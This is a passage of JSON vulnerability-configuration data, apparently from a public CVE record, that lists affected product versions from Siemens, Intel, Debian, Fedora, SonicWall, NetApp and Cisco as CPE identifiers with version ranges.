"cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_command:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.16.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:gma-manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.6.2j-398",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:e-car_operation_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:navigator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2020",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:operation_scheduler:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.1.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:opcenter_intelligence:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:mindsphere:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-11",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management_hub:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:data_center_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "10.0.12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.3\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:nexus_dashboard:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.6.3.1",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.4.1",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.5.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.9-361",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.1.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.5.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces\\:_connector:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.0.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_platform_infrastructure:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.10.0.1",
"versionStartIncluding": "2.10.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.9.1.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.10.0.16",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_workload_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite_admin:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_cost_optimizer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.000.009",
"versionStartIncluding": "3.2.000.000",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.1.000.044",
"versionStartIncluding": "3.1.000.000",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.0.000.115",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:nexus_insights:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:advanced_malware_protection_virtual_private_cloud_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.5.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:customer_experience_cloud_agent:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.12.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:workload_optimization_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0\\(1p\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_director:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.8.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.3.4.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.1.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.4",
"versionStartIncluding": "2.2.3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.4.2.1",
"versionStartIncluding": "20.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "7.3.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.4.4",
"versionStartIncluding": "3.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1.1",
"versionStartIncluding": "20.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.2.8",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.6.2.1",
"versionStartIncluding": "20.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.6.7",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.2.8",
"versionStartIncluding": "2.2.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_operations_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "7.14.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_voice_browser:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_workforce_optimization:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_sip_proxy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "10.2.1v2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_intelligence_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6\\(2\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:session_management:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:-:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
